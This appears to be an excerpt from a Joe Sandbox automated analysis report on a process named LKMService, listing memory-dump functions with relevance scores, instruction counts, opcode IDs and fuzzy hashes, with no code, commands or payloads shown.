Instruction ID: bb7355b4c54fde97326cdf999b7d120ac5ab65e4459949622219bd906e4f9e3d
Opcode Fuzzy Hash: 4a4f7a72fa3504dfaeb0defde5c537c0903eedcf27b22d3276c0b7b1d56ba809
Instruction Fuzzy Hash: FA815A74A002498FCB15CFA8D495A9DBFF1BF49314F1981A5E805EB3A1D770AC86CF54

Function 025A2520 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fe4d08ea50d33c164bdfd3d7af9a523524faa0f24b13d61edf0fdf78c6abd18
Instruction ID: a73b53908d1c6c4cd0e859bc7ffe94b1a45af6cc3e8532f69a92c9cc20b38d55
Opcode Fuzzy Hash: 4fe4d08ea50d33c164bdfd3d7af9a523524faa0f24b13d61edf0fdf78c6abd18
Instruction Fuzzy Hash: 1C91D175A002498FDB16CFA8C891ACCBBF1BF49320F194595E851FB3A5D731AE81CB60

Function 025A4145 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e847731da50894597ff63d1bd5e8884e1e1c9f6c27180c4dc264ed529eede181
Instruction ID: 7aea906e49f70be393d20666b0a622c7b113d7842119a8bd21f11e260e28ab53
Opcode Fuzzy Hash: e847731da50894597ff63d1bd5e8884e1e1c9f6c27180c4dc264ed529eede181
Instruction Fuzzy Hash: E1713774A00209CFCB15CFA8D495A9DBBF1BF49314F1981A5E805EB365DB30AD86CF54

Function 025A2511 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844df2ac566ffc1ccff4a352035338379373541f30c01d5db9e3f8c2c95edf65
Instruction ID: 9fde0548eb1e79aff4a10356e977b2aac52edf9774402ffefce569a7454d7da1
Opcode Fuzzy Hash: 844df2ac566ffc1ccff4a352035338379373541f30c01d5db9e3f8c2c95edf65
Instruction Fuzzy Hash: 1A71DF75A002498FDB16CFA8C981ACCBBF1BF49320F191595E851FB3A5D731AE85CB60

Function 025A39F8 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0173708ff8c8b7500cec486dfbd666f8973bd16057de953d5ae282c195c1f1e
Instruction ID: b64719c0ed6536a42ca015454ecf886c57a3db678694be3915028b1a0fb0c5ee
Opcode Fuzzy Hash: d0173708ff8c8b7500cec486dfbd666f8973bd16057de953d5ae282c195c1f1e
Instruction Fuzzy Hash: AB515671E0021CDBDB14DFA9D895B9DBBF2BF88318F14806AD41AAB254DB749941CF84

Function 025A3BE8 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585a0a86baa1f8aedcbeae4830226d7f5b2bfea1b8f6b3602dc468757c0e5278
Instruction ID: 3f28de8f0d6e6934384842d580e5a3be5a26835e5fb83c55bd149fa6ae9daa98
Opcode Fuzzy Hash: 585a0a86baa1f8aedcbeae4830226d7f5b2bfea1b8f6b3602dc468757c0e5278
Instruction Fuzzy Hash: 5F515871E00319DFCB14CFA9C8A579EBBF1BF88358F108469E419AB250DB349942CF84

Function 025A39ED Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec6b5f6c44e41070c96f4d67b49868f1aeb2afc05b8302050609da8e58b8054a
Instruction ID: 83dac4e3727c7755c31826b0841840151d031d048b263d3ff1fb0ad4babbd479
Opcode Fuzzy Hash: ec6b5f6c44e41070c96f4d67b49868f1aeb2afc05b8302050609da8e58b8054a
Instruction Fuzzy Hash: 8E5145B0E00219DBDB14DFA9D895B9DBFF2BB48308F148069E41AAB290D7749945CF84

Function 025A59BA Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e84f56515e23148bfa5aace9f8a9b5dd80da6094e6145e550fa73d830cb439
Instruction ID: 16cf49d7c2c1673ae6deb5e398386f88ed9b7ca4d0c7dd55f277b9dbbbdfd2d4
Opcode Fuzzy Hash: 37e84f56515e23148bfa5aace9f8a9b5dd80da6094e6145e550fa73d830cb439
Instruction Fuzzy Hash: D5413331C1E38ADEDB02AB78996949DBF70FF52314F5A04D7C0819B17BE220848DC72A

Function 025A0B28 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 421234e15b7a5be0131982b3d7d022fabc977948104791a4d67d91a63dd4465b
Instruction ID: 8ddd6e7430d697558b32455f7b9a7df64f0ec26e79470ea28c8068162097d82c
Opcode Fuzzy Hash: 421234e15b7a5be0131982b3d7d022fabc977948104791a4d67d91a63dd4465b
Instruction Fuzzy Hash: 5B41E271A003558FDF25CF28D850A9EBFF2FF89200F044A59D496EB3A1D734A809CB64

Function 025A3BDC Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf69b00e04b0b83a130221bb9a00e987578651eb78777e94a2ea56d7e7f60a23
Instruction ID: 2b427202a5653494cbe16a19110d135ca50a56be097b221ba7a4000db38d3a60
Opcode Fuzzy Hash: cf69b00e04b0b83a130221bb9a00e987578651eb78777e94a2ea56d7e7f60a23
Instruction Fuzzy Hash: D24157B0E00359EFDB14CFA9C9A679EBBF1BF48708F108069E419AB250D7749985CB84

Function 025A1D6D Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c10ee8b1bf5496b2852baad330979f2fee7c4f39f0e5859233adc04949f4621c
Instruction ID: 6bb90393850013c41a418fc4421b6042c9d4e1d891c683b7f230bb43fbb446f0
Opcode Fuzzy Hash: c10ee8b1bf5496b2852baad330979f2fee7c4f39f0e5859233adc04949f4621c
Instruction Fuzzy Hash: DB31CC4168E7D16FD303563818724AA3F319EA3058B0E86D7C4C4CF9A7D8088C4EC3BA

Function 025A23B0 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0abb7a9f448c2b02d6b4a724886c032d7c9f80b6a76146998981cbc2db94399f
Instruction ID: 33745bb9510f0303e293c146608ec6501dd13899b2eab09e0e979d45ce3f576e
Opcode Fuzzy Hash: 0abb7a9f448c2b02d6b4a724886c032d7c9f80b6a76146998981cbc2db94399f
Instruction Fuzzy Hash: 88319E70A007558FDB25CF68D9516CEBBF5FF89340F044A5AE886EB2A1D730A844CB61

Function 025A69A8 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c90173261f1edc0dba9efa8518ea31000ab0ff004ec4762e6f15e6c00db8267f
Instruction ID: de1f2353325fbeb868b40198824820b24758653fbe2f01ea0490f4696d47db2e
Opcode Fuzzy Hash: c90173261f1edc0dba9efa8518ea31000ab0ff004ec4762e6f15e6c00db8267f
Instruction Fuzzy Hash: 02311575A002588FDF09DFA8C950ADDBBF6FF89310B144195E446BB3A5CB31AD01CB64

Function 025A4DB5 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa56b3ab32c9fe523e84b2fb83e6d76d83ba2106e5720fe58dc366b82125bf35
Instruction ID: 3a2e66bc8e5babae0ff871eafbe7944c90f8cfad47e97a4a09618369e5cff2da
Opcode Fuzzy Hash: fa56b3ab32c9fe523e84b2fb83e6d76d83ba2106e5720fe58dc366b82125bf35
Instruction Fuzzy Hash: 6C3144B0D002489FDB14CFE9C694ADEBFF5BF48310F248429E949AB260DB749945CFA0

Function 025A2120 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb7d4f794fbf6c7fd6686075979e46a312d98200500504d8c44b4703be22984
Instruction ID: 88981e95bd4568c348dcbe8c3b6416f52f4cd81e5a47990b5a6a8055dd3685b7
Opcode Fuzzy Hash: aeb7d4f794fbf6c7fd6686075979e46a312d98200500504d8c44b4703be22984
Instruction Fuzzy Hash: 4431DF70A006469FDB15DF78C91169EBBF6FF88300F008629D44AEB395DB34AD55CBA1

Function 025A4DC0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123a0e8e9c02d8d0c1cb639b75fb7bce7b3415cfcbce52174896b6807f762969
Instruction ID: 0c1d2d91c5b85aea3fde6817fb18f91e7f7c769ebd5b694ec8710ede16ad727c
Opcode Fuzzy Hash: 123a0e8e9c02d8d0c1cb639b75fb7bce7b3415cfcbce52174896b6807f762969
Instruction Fuzzy Hash: D73133B0D002489FDB14CFE9C690ADEBFF5BF48350F248429E909AB260CB749945CFA0

Function 025A4664 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a59759db6754ff09931108a9170edf601a310bf325ecf3a895099d56a62a0ed
Instruction ID: c04f12b2185c51fa00badcd44925ddc927bd96f6c48ec7d8f61c7cd2ba09e75a
Opcode Fuzzy Hash: 9a59759db6754ff09931108a9170edf601a310bf325ecf3a895099d56a62a0ed
Instruction Fuzzy Hash: FD3167B1D01288DFCB14CFA9C895BDEBFF8BF49300F14806AD045A7240CB74A846CB54

Function 025A4680 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c04a704369a43a2fa0148b2eb511b596f8a1fe3ef9a676d8c15fe679f55e28fa
Instruction ID: 2987a596b791f3b2959da3e4d16ee0f6ff8555fe47140808056001f8594f7d19
Opcode Fuzzy Hash: c04a704369a43a2fa0148b2eb511b596f8a1fe3ef9a676d8c15fe679f55e28fa
Instruction Fuzzy Hash: 103102B5D01258DFCB14CFA9D895ADEBBF5BF89310F20802AE409A7250DB74A946CB94

Function 025A2318 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13cccda0131fc1f110a191986daa04acaccaff2ffd3e82fab256c6cb9cc75d20
Instruction ID: da14245dae877d7d6c572833a3cfcb9ee78789db560e66efe3824ef754b41ea1
Opcode Fuzzy Hash: 13cccda0131fc1f110a191986daa04acaccaff2ffd3e82fab256c6cb9cc75d20
Instruction Fuzzy Hash: 7721D732D1060ADBCF14DBB8C8115DEFBB6AFC9310F158626D512B7264EF70254ACB91

Function 025A2110 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31afe7448ef51a3ad54bb4159c8ed4313f53deb99cf42be48eb9f92f2fe9e0a0
Instruction ID: b1712281f7b0c40827ef7ca07fc92f46a54ec87ff64acf9667602377a44ddb46
Opcode Fuzzy Hash: 31afe7448ef51a3ad54bb4159c8ed4313f53deb99cf42be48eb9f92f2fe9e0a0
Instruction Fuzzy Hash: BD21FC31A002169FDB15DB38C9116AEBBF6FF88300F008929D846E7395DB24AD05CBA0

Function 025A32DF Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ea164ac5339dbb3a96ccd684715eaabf83ecc71ec8aab6c8f2bc8017d61d8cc
Instruction ID: 22f481b72577e8e3f11f74ecc737f62db91adb23db9b3a740fa56786e89b7012
Opcode Fuzzy Hash: 9ea164ac5339dbb3a96ccd684715eaabf83ecc71ec8aab6c8f2bc8017d61d8cc
Instruction Fuzzy Hash: 4A216D31E10215DBDB14EB69D8667EDBBB2BB88314F14D06AD402BB390CB359C41CF98

Function 025A2A91 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2259f5de856a4716ecee094021b5ebcf5505e15d999bf6e51213838685bb00f4
Instruction ID: ff7b0cc8195ea5c00b5d99b9426aed75d88a728adfc55e0f61f19bf3ab46dc32
Opcode Fuzzy Hash: 2259f5de856a4716ecee094021b5ebcf5505e15d999bf6e51213838685bb00f4
Instruction Fuzzy Hash: 7C21C671E01218AFDF05DFB4E941ADEBFF6AF89310F1444A6E401BB255DA305E45CB60

Function 025A452F Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e37f7047d16699991f01eb4fa7a5d5acab3e5799d20ad49806cead8bcb9052f7
Instruction ID: 987041a1d8bbc0e75f1edf335de231cc4a679f745d4d9f40cf9ad2282bdc9abe
Opcode Fuzzy Hash: e37f7047d16699991f01eb4fa7a5d5acab3e5799d20ad49806cead8bcb9052f7
Instruction Fuzzy Hash: 3A213D71A002189FCB15CFA8D490A9DBBF1FF88260F198169E44ADB365D730AD86CB50

Function 025A0A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da7bfd063b7b88770de5c4c05f583ef5147a01adc86f17033f46a11b8442e7a
Instruction ID: 87c66b8f7b89bc8125de087867851cf8ed58941dce4b8dd6aa46c7af18930e10
Opcode Fuzzy Hash: 5da7bfd063b7b88770de5c4c05f583ef5147a01adc86f17033f46a11b8442e7a
Instruction Fuzzy Hash: 7C1119343105109FC748EB3DE558A1D7BE6FF8DA1176540A8E506CB7B5CE75DC018BA1

Function 025A0F20 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 733c269fc223c554094e3f649e00b6ff33862b25f58b867bbb6dd596d13b8d40
Instruction ID: 5389320fe88971f00359a71da8f50a790a4dd8abe426e796f5ff4a53cb2a359a
Opcode Fuzzy Hash: 733c269fc223c554094e3f649e00b6ff33862b25f58b867bbb6dd596d13b8d40
Instruction Fuzzy Hash: F7217F39A012489FDB04CF98E894D9DBBF1FF48320F098095E809AB366D730ED81CB50

Function 025A32F0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf7a0c6c31336e5ae55f2826407f74f6ae5c3470ab2131b96aec5ca6df27447c
Instruction ID: 1b903b11f39edca8e9c575202517eb256a2362bbb5fc83f9f04be5fe1494fa68
Opcode Fuzzy Hash: cf7a0c6c31336e5ae55f2826407f74f6ae5c3470ab2131b96aec5ca6df27447c
Instruction Fuzzy Hash: 24214D31E10215DBDB14EBA9D465BEDBBB6BB88344F14C06AD402AB394CF759C41CF98

Function 025A6997 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79a3439f732550bf9b5017b4a762b8fe363057c97657fec28a1bd4b8c59847ac
Instruction ID: 0038c62ba5ecb4fdf7a00ccfcf120ddb3ed2d194a8eafbd3c755661f7f627c22
Opcode Fuzzy Hash: 79a3439f732550bf9b5017b4a762b8fe363057c97657fec28a1bd4b8c59847ac
Instruction Fuzzy Hash: B8119A32A002188FDF05DF68D8509CEBBF6FF89310B5480A5D002BB352DB31AE05CB64

Function 025A3920 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df5b2b8f35cdc92b2df834ecf25839dd638650fb4d12c8e236690d5994419fe1
Instruction ID: 1c75bc77e63737e648c0d949764bedf5cf971d8b83d65458d2592397fbbfbe7f
Opcode Fuzzy Hash: df5b2b8f35cdc92b2df834ecf25839dd638650fb4d12c8e236690d5994419fe1
Instruction Fuzzy Hash: 94118132E107068BCB05EBB9D8A46AEF775EFD5340B10C665D459A7254EF30A981CBD0

Function 025A3930 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65064e10dac2eabb6671354d4b8c099fe5d2dfe663d5a822053eda433ba79506
Instruction ID: 85542861b7b731d8abd942a4851ae77065362a0bde2cc6c9c879804011e0230a
Opcode Fuzzy Hash: 65064e10dac2eabb6671354d4b8c099fe5d2dfe663d5a822053eda433ba79506
Instruction Fuzzy Hash: A8118F31E107068BCB05AFB9D8644AEF7B6FFC9340710C66AD419A7254EF30A985CB90

Function 025A6A8F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9feb5b8878a2a21eefb062caa3efc152362e16731935fc886a6d49a2b73bf34
Instruction ID: 9831bd9134ba727b6030aaa88292178752bbfdd93d919c61b5e1bc1e78b1364e
Opcode Fuzzy Hash: d9feb5b8878a2a21eefb062caa3efc152362e16731935fc886a6d49a2b73bf34
Instruction Fuzzy Hash: 4E115135A00114CFCF18DFA8D5519ACBBB1FF89324B198295D043AB2A1DB70ED91CF65

Function 025A0CC1 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 440cf154b483ac00e0a4bd999becb95aa5bf26d0643cb1bb7ef3b56ecb56aa6e
Instruction ID: d022f188e27d315091a14fb5598477186c4a5e8631c93987ca1b3a51fcb40c1c
Opcode Fuzzy Hash: 440cf154b483ac00e0a4bd999becb95aa5bf26d0643cb1bb7ef3b56ecb56aa6e
Instruction Fuzzy Hash: 5311C232D1574AABCB058BB8DC404DDFB76EFCA310B1A82A7E010B7560EB74244AC761

Function 025A23A0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4a0b80c237fb8ba8524c46f14ba823b353bc37bfb65cb307cba3d14a3a1775f
Instruction ID: 5083bbb460b24d276faf2bbe93ebc7156a93c447d804e5c44b2c4537706bf729
Opcode Fuzzy Hash: c4a0b80c237fb8ba8524c46f14ba823b353bc37bfb65cb307cba3d14a3a1775f
Instruction Fuzzy Hash: F0118732A002598BCB21CF28E8115CEBBF6FF88201B04456AE885E7321D730A904CBA5

Function 025A0989 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ec5073021b029582332dce9f478b90a4d662225470ee25ad1fb54c366797d86
Instruction ID: 4f5b2306dc30ec6da161388898ca7c53c32062626e523edef3c547b8de638157
Opcode Fuzzy Hash: 2ec5073021b029582332dce9f478b90a4d662225470ee25ad1fb54c366797d86
Instruction Fuzzy Hash: 9C113A39504245DFDB06EF38E989948BFB1EF45300B1086A9D4019723EEB386A59CF40

Function 025A688C Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd09d2f53ef7ccfb1355d8aad1e805faef31d74398b0616155954af1eebfa00
Instruction ID: 431a2025acf03ff773531519880a7e8c37d671e89453029f781278bcbc9673bd
Opcode Fuzzy Hash: afd09d2f53ef7ccfb1355d8aad1e805faef31d74398b0616155954af1eebfa00
Instruction Fuzzy Hash: A9018432D5070B9BCF009BE9D8445DEBB75DFD5320F595761D100B75A0EB74228ACBA1

Function 025A0879 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68c67f13a299c0c72e61d827528b98c5bb3342ed7da6e22b80442dd9edc189a0
Instruction ID: 14f10f4d56cbf3696eca17fd0e025669344200f0339f996a35e26126192df317
Opcode Fuzzy Hash: 68c67f13a299c0c72e61d827528b98c5bb3342ed7da6e22b80442dd9edc189a0
Instruction Fuzzy Hash: F8019232D0474A9BCB019BB9D8004DDFB76AFCA310F1A8696D111BB161E774258ACBA1

Function 025A2809 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153e8cfd3fe98ed1dc41ca612ea7232962db3d7f92c39747b420faceda7aa5c1
Instruction ID: fc4e4369b0c6be8c02fd1a195f52f7a2ae72dfa728ed539c46abd142ff2608db
Opcode Fuzzy Hash: 153e8cfd3fe98ed1dc41ca612ea7232962db3d7f92c39747b420faceda7aa5c1
Instruction Fuzzy Hash: 1301B132D0160A9ACF00DBB8EC105EDFB71EFC9321F150A61E100B7160E774219ACB60

Function 025A2290 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eae4bbde5150704d682706beba91f81a6c0efc25ae16596e30a5a38da1ae5122
Instruction ID: ed8c919941078a113983378aa2628e3c83fb3f7e4d70422c12d6b8b15f5bbbaf
Opcode Fuzzy Hash: eae4bbde5150704d682706beba91f81a6c0efc25ae16596e30a5a38da1ae5122
Instruction Fuzzy Hash: C9018F32D0060BD7CF149BB9D8005DDFBB6EFCA310F158662D111B7660EB74268ACBA1

Function 00D1D161 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4132485646.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d1d000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8217f424350b21d44f5bc3f8a5aae560ff8c4d302bf6fb6558a66765c7d3d15
Instruction ID: 20acc55e4d971de3cd20bf77e0d5a2069b7ec7fb49f6d06442494395bd6b1fcd
Opcode Fuzzy Hash: b8217f424350b21d44f5bc3f8a5aae560ff8c4d302bf6fb6558a66765c7d3d15
